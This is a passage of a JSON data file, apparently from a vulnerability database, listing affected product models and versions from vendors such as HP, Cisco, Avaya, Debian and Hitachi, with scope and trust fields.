        "version": "2.01"
      },
      {
        "model": "virtualization performance viewer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.0"
      },
      {
        "model": "virtualization performance viewer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1.2"
      },
      {
        "model": "virtualization performance viewer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1.1"
      },
      {
        "model": "virtualization performance viewer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1.0"
      },
      {
        "model": "vcx",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "u200s and cs (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)0"
      },
      {
        "model": "u200a and m (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)0"
      },
      {
        "model": "tcp/ip services for openvms",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5.7"
      },
      {
        "model": "secblade iii (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)0"
      },
      {
        "model": "secblade fw (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)0"
      },
      {
        "model": "msr50 g2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5-0"
      },
      {
        "model": "msr50",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5-0"
      },
      {
        "model": "msr30-1x",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5-0"
      },
      {
        "model": "msr30-16",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5-0"
      },
      {
        "model": "msr30",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5-0"
      },
      {
        "model": "msr20-1x (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)0"
      },
      {
        "model": "msr20-1x",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5-0"
      },
      {
        "model": "msr20 (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)0"
      },
      {
        "model": "msr1000 (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)0"
      },
      {
        "model": "msr (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "9xx5)0"
      },
      {
        "model": "msr (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "93x5)0"
      },
      {
        "model": "msr 50-g2 (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)0"
      },
      {
        "model": "msr (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "505)0"
      },
      {
        "model": "msr (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "30-1x5)0"
      },
      {
        "model": "msr (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "30-165)0"
      },
      {
        "model": "msr (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "305)0"
      },
      {
        "model": "hsr6800 (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)0"
      },
      {
        "model": "hsr6602 (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)0"
      },
      {
        "model": "hp870 (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)0"
      },
      {
        "model": "hp850 (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)0"
      },
      {
        "model": "hp830 (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)0"
      },
      {
        "model": "hp6000 (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)0"
      },
      {
        "model": "hp-ux b.11.31",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "f5000-c/s (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)0"
      },
      {
        "model": "f5000-a (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)0"
      },
      {
        "model": "f1000-s-ei (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)0"
      },
      {
        "model": "f1000-e (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)0"
      },
      {
        "model": "f1000-a-ei (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)0"
      },
      {
        "model": "a6600 (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)0"
      },
      {
        "model": "9500e (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)0"
      },
      {
        "model": "(comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "88005)0"
      },
      {
        "model": "(comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "75005)0"
      },
      {
        "model": "(comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "58305)0"
      },
      {
        "model": "(comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "58205)0"
      },
      {
        "model": "(comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "58005)0"
      },
      {
        "model": "5500si (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)0"
      },
      {
        "model": "hi (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "55005)0"
      },
      {
        "model": "ei (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "55005)0"
      },
      {
        "model": "si (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "51205)0"
      },
      {
        "model": "ei (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "51205)0"
      },
      {
        "model": "4800g (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)0"
      },
      {
        "model": "4500g (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)0"
      },
      {
        "model": "4210g (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)0"
      },
      {
        "model": "(comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "36105)0"
      },
      {
        "model": "(comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3600v25)0"
      },
      {
        "model": "(comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3100v2-485)0"
      },
      {
        "model": "(comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3100v25)0"
      },
      {
        "model": "(comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "125005)0"
      },
      {
        "model": "(comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "105005)0"
      },
      {
        "model": "enterprise server ap8800",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "0"
      },
      {
        "model": "enterprise server ap7000",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "0"
      },
      {
        "model": "bladesymphony cb500 series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "0"
      },
      {
        "model": "bladesymphony cb320 series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "0"
      },
      {
        "model": "bladesymphony cb2500 series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "0"
      },
      {
        "model": "bladesymphony cb2000 series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "0"
      },
      {
        "model": "bladesymphony bs500 series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "0"
      },
      {
        "model": "bladesymphony bs320 series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "0"
      },
      {
        "model": "bladesymphony bs2500 series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "0"
      },
      {
        "model": "bladesymphony bs2000 series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "0"
      },
      {
        "model": "bladesymphony bs1000 series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "0"
      },
      {
        "model": "advanced server ha8000cr",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "0"
      },
      {
        "model": "linux",
        "scope": null,
        "trust": 0.3,
        "vendor": "gentoo",
        "version": null
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "0"
      },
      {
        "model": "load balancer big-ip1500",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "0"
      },
      {
        "model": "vipr srm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "emc",
        "version": "3.6.0"
      },
      {
        "model": "m\u0026r",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "emc",
        "version": "6.5"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "netscaler gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "0"
      },
      {
        "model": "netscaler application delivery controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "0"
      },
      {
        "model": "wide area application services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "webex social",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "webex meetings server base",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.5"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.5"
      },
      {
        "model": "webex meetings server 2.0mr2",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.0"
      },
      {
        "model": "virtualization experience client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "62150"
      },
      {
        "model": "virtual systems operations center for vpe project",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "virtual security gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "videoscape conductor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "videoscape back office",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "video surveillance media server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "video delivery system recorder",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "universal small cell ran management system wireless",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "unity connection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "unified sip proxy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "unified provisioning manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.6"
      },
      {
        "model": "unified meetingplace",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "unified intelligence center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "unified contact center express",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "unified communications manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "unified communications domain manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "ucs manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "ucs invicta series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "ucs director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "transaction encryption device",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "telepresence tx series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "90000"
      },
      {
        "model": "telepresence te software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "-0"
      },
      {
        "model": "telepresence system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "500-370"
      },
      {
        "model": "telepresence system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "500-320"
      },
      {
        "model": "telepresence system series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "30000"
      },
      {
        "model": "telepresence system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "13000"
      },
      {
        "model": "telepresence system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11000"
      },
      {
        "model": "telepresence system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10000"
      },
      {
        "model": "telepresence profile series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "telepresence isdn link",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "telepresence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "13100"
      },
      {
        "model": "show and share",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "service control engines system software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "scos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "remote network control system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "remote conditional access system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "quantum son suite",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "quantum policy suite",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "prime service catalog virtual appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "prime license manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "prime lan management solution",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "prime infrastructure",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "prime data center network manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "prime collaboration provisioning",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "powervu network center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "powervu d9190 conditional access manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "powerkey encryption server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "physical access manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "onepk all-in-one vm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "nexus series switches",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "90000"
      },
      {
        "model": "nexus series switches",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "70000"
      },
      {
        "model": "nexus series switches",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "60000"
      },
      {
        "model": "nexus series switches",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "50000"
      },
      {
        "model": "nexus series switches",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "40000"
      },
      {
        "model": "nexus series switches",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "30000"
      },
      {
        "model": "nexus series switches",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1000v0"
      },
      {
        "model": "network configuration and change management service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "network configuration and change management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "netflow collection agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "mediasense",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "media experience engines",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "mds series multilayer switches",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "90000"
      },
      {
        "model": "management heartbeat server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "jabber guest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "iptv service delivery system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "ip interoperability and collaboration system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "ios xr software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "ios xr for cisco network convergence system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "60000"
      },
      {
        "model": "international digital network control system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "intelligent automation for cloud",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "im and presence service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "firesight system software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "finesse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "explorer controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "enterprise content delivery service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "encryption appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "emergency responder",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "emergency responder",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "dncs application server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "digital transport adapter control system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "digital network control system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "digital media manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "dcm series 9900-digital content manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "d9036 modular encoding platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "common services platform collector",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "common download server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "command server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "20000"
      },
      {
        "model": "cloud object store",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "telepresence endpoints sx series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "telepresence endpoints mxg2 series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "telepresence endpoints mx series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "telepresence endpoints ex series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "telepresence endpoints c series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "telepresence endpoints 10\" touch panel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "ironport encryption appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "application policy infrastructure controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "autobackup server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "asa cx and cisco prime security manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "application networking manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "application and content networking system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "centos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "centos",
        "version": "7"
      },
      {
        "model": "centos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "centos",
        "version": "5"
      },
      {
        "model": "proactive contact",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "proactive contact",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "one-x client enablement services sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "one-x client enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "one-x client enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.2"
      },
      {
        "model": "one-x client enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.1"
      },
      {
        "model": "message networking",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3"
      },
      {
        "model": "message networking",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2.0"
      },
      {
        "model": "meeting exchange",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "meeting exchange",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "meeting exchange",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "iq",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1.1"
      },
      {
        "model": "iq",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "iq",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5"
      },
      {
        "model": "ip office server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "9.0"
      },
      {
        "model": "ip office server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "8.1"
      },
      {
        "model": "ip office application server sp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "9.02"
      },
      {
        "model": "ip office application server sp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "9.01"
      },
      {
        "model": "ip office application server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "9.0"
      },
      {
        "model": "ip office application server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "8.1"
      },
      {
        "model": "ip office application server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "8.0"
      },
      {
        "model": "communication server 1000m signaling server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.5"
      },
      {
        "model": "communication server 1000m signaling server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.0"
      },
      {
        "model": "communication server 1000m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.5"
      },
      {
        "model": "communication server 1000m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.0"
      },
      {
        "model": "communication server 1000e signaling server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.5"
      },
      {
        "model": "communication server 1000e signaling server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.0"
      },
      {
        "model": "communication server 1000e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.5"
      },
      {
        "model": "communication server 1000e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.0"
      },
      {
        "model": "cms r17",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2.1"
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0.2"
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0.1"
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3"
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2.1.0.9"
      },
      {
        "model": "aura system platform sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0.3.9.3"
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0.3.8.3"
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0.3.0.3"
      },
      {
        "model": "aura system platform sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "aura system platform sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3"
      },
      {
        "model": "aura system manager sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.5"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.3"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
